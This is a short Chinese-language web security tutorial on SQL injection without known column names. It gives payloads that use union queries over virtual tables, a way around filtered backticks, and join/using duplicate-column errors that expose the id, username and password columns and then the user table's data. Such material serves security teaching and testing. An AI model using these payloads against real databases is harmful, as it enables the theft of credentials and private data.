WEB安全--SQL注入--无列名注入

一、原理：

当我们只知道表名不知道列名时，可以通过联合查询创建虚拟字段查询信息，或者是利用join、using关键字报错得到列名。

二、利用手段：

2.1）创建虚表查询：

#创建虚表
select 1,2,3 union select * from user;

#查询第二列数据
select `2` from (select 1,2,3 union select * from user)xxx;

当反引号 ` 被过滤时，可以使用如下方式查询：

select b from (select 1 as a,2 as b,3 as c union select * from user)xxx;

2.2）join+using爆出列名：

# 得到 id 列名重复报错
select * from user where id='1' union all select * from (select * from user as a join user as b)as c;
# 得到 username 列名重复报错
select * from user where id='1' union all select * from (select * from user as a join user as b using(id))as c;
# 得到 password 列名重复报错
select * from user where id='1' union all select * from (select * from user as a join user as b using(id,username))as c;
# 得到 user 表中的数据
select * from user where id='1' union all select * from (select * from user as a join user as b using(id,username,password))as c;